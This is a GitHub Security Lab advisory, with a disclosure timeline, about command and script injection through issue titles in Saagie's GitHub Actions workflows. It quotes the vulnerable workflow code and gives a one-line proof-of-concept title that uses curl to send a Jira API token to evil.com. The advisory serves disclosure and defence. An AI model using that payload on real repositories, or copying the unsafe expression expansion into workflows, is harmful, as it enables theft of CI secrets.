Coordinated Disclosure Timeline
- 2021-01-18: Issue reported to security at Saagie.
- 2021-02-23: Report acknowledged.
- 2021-03-01: Additional issue reported.
- 2021-04-21: No response. Asked for an update.
- 2021-07-20: Asked for an update.
- 2021-07-26: Confirmation received.
- 2021-07-29: Patch files were sent to security at Saagie to apply. No reply.
- 2021-12-06: Public pull requests were created.
- 2021-12-08: Response was received.
- 2022-01-14: The pull requests were merged.
Summary
The close_issue.yml and create_issue.yml GitHub workflows in the saagie/sdk, saagie/technologies-plugin and saagie/technologies repositories are vulnerable to arbitrary command/script injection through the title of a GitHub issue.
Product
saagie/sdk GitHub repository
saagie/technologies-plugin GitHub repository
saagie/technologies GitHub repository
Tested Version
saagie/sdk
saagie/technologies-plugin
saagie/technologies
Details
Issue 1: The issue title is used to format a shell command
The issue title (github.event.issue.title) is expanded into the text of a run: bash script before the script is executed, so anything in the title is parsed as shell syntax rather than treated as data:
on:
  issues:
    types: [closed, deleted]
...
      - name: Extract JIRA number
        run: echo "::set-output name=jira_number::$(echo ${{ github.event.issue.title }}| sed 's/.*\[\(${{ secrets.JIRA_PROJECT }}-[[:digit:]]\{1,\}\)\].*/\1/')"
...
Impact
This vulnerability allows arbitrary command injection into the bash script, which may allow exfiltration of secret tokens to an attacker-controlled server. As a proof of concept, an issue with the title `curl http://evil.com/$JIRA_API_TOKEN` would exfiltrate the secret Jira token to the attacker-controlled server.
Issue 2: The issue title is used to format a script
The ${{ }} expression expansion is performed on the JavaScript source of the script: input before actions/github-script executes it, so a single quote in the issue title closes the string literal and allows script injection.
...
      - name: Change Title
        uses: actions/github-script@0.8.0
        with:
          github-token: ${{secrets.GITHUB_TOKEN}}
          script: >
            github.issues.update({
              issue_number: context.issue.number,
              owner: context.repo.owner,
              repo: context.repo.repo,
              title: '[${{ steps.create_jira_issue.outputs.issue }}] ${{ env.ISSUE_TITLE }}'
            })
...
Impact
Similarly to Issue 1, this vulnerability allows arbitrary script injection, with the injected JavaScript running in the step that holds the GITHUB_TOKEN passed to actions/github-script, and may allow exfiltration of secret tokens to an attacker-controlled server.
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-001 in any communication regarding this issue.